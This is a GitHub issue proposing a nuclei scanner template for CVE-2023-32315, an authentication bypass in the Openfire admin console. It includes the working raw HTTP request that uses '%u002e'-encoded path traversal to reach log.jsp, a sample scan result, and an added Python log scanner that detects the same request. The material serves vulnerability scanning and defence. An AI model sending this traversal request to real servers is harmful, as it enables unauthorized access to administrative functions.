projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

Administration Console authentication bypass in openfire xmppserver #7325

Closed vsh00t closed 1 year ago

vsh00t commented 1 year ago

Template Information:

An important security issue affects a range of versions of Openfire, the cross-platform real-time collaboration server based on the XMPP protocol that is created by the Ignite Realtime community.

reference:

Nuclei Template:

id: CVE-2023-32315

info:
  name: Administration Console authentication bypass in openfire xmppserver
  author: vsh00t
  severity: high
  description: |
    An important security issue affects a range of versions of Openfire, the cross-platform real-time collaboration server based on the XMPP protocol that is created by the Ignite Realtime community.
  remediation: The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0).
  reference:
    - https://github.com/advisories/GHSA-gw42-f939-fhvm
  classification:
    cve-id: CVE-2023-32315
  metadata:
    max-request: 1  # the http block below sends a single raw request
    verified: "true"
  tags: authentication,bypass,cve,cve2023

http:
  - raw:
      - |+
        GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    unsafe: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "apache"
          - "java"
          - "openfire"
          - "jivesoftware"
        part: body
        condition: or  # any single word above is enough to satisfy this matcher

[CVE-2023-32315] [http] [high] http://IPADD:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
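
A defender-side companion to the template above, added here as an example and not part of the original issue or the nuclei-templates project: it scans web access logs for the same encoded `..` request under `/setup/`, and goes slightly further by also catching ordinary `%2e` encoding. The Common Log Format layout and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Non-standard %uXXXX escapes (as used in the template's request path) are
# not decoded by urllib, so they are handled explicitly.
_U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})", re.IGNORECASE)
# Assumed layout: Common Log Format, '"METHOD PATH PROTO" STATUS'.
_REQUEST = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /login.jsp HTTP/1.1" 200 2048',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /setup/setup-s/%u002E%u002E/%u002e%u002e/log.jsp HTTP/1.1" 302 0',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /setup/index.jsp HTTP/1.1" 302 0',
]


def decode_path(raw: str) -> str:
    """Decode %uXXXX escapes first, then ordinary %XX escapes."""
    step = _U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), raw)
    return unquote(step)


def is_setup_traversal(raw_path: str) -> bool:
    """True if a /setup/ request hides a '..' segment behind URL encoding."""
    path = raw_path.split("?", 1)[0]
    if not path.lower().startswith("/setup/"):
        return False
    # A segment that only becomes '..' after decoding was deliberately encoded.
    return any(seg != ".." and decode_path(seg) == ".." for seg in path.split("/"))


def scan(lines):
    """Return one record per log line that carries the encoded traversal."""
    hits = []
    for line in lines:
        m = _REQUEST.search(line)
        if m and is_setup_traversal(m.group("path")):
            status = int(m.group("status"))
            # 200 is the status the template's matcher looks for.
            hits.append({"path": m.group("path"), "status": status, "served": status == 200})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits with `served: True` are the ones to triage first, then check the server against the fixed releases named in the template's remediation field.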

DhiyaneshGeek commented 1 year ago

Hi @vsh00t Thank you so much for sharing this template, I have raised a PR #7334.

Cheers 🍻